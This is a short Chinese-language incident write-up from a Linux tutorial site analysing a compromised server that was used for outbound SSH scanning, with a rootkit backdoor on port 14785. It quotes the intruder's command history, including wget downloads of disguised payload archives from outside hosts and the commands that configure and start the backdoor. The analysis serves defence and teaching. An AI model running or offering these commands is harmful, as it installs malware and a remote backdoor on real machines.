歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
您现在的位置: Linux教程網 >> UnixLinux >  >> Linux管理 >> Linux服務

分析一台被入侵的linux服務器

  客戶反映一台linux服務器老向外ssh掃描,登陸到服務器上,查看進程發現大量ssh-scan在運行,運行用戶為mircte,查找ssh-scan這個文件,確定所在位置/var/log目錄下

  黑客進入服務器後所做的操作:

  1.       向/var/tmp/下上傳了兩個惡意程序

  其中wtf為向外掃描其它服務器的ssh-scan黑客軟件,.access.log文件下存放有rootkit後門,服務器被當成了肉雞跳板,開放14785端口等待入侵者連接,掃描其它服務器所得到的賬號都發送到[email protected]這個郵箱。

  2.       入侵者登陸記錄

  85.120.78.140的IP來自羅馬尼亞。

  3.       wget http://pinky.clan.su/scan/wtf.jpg ; tar zxvf wtf.jpg

  wget adelinuangell.lx.ro/ryo.tar

  tar xvf ryo.tar

  cd .access.log

  ./config Ady 14785

  ./run

  結束進程。刪掉程序。。刪掉用戶。修改root密碼。

Copyright © Linux教程網 All Rights Reserved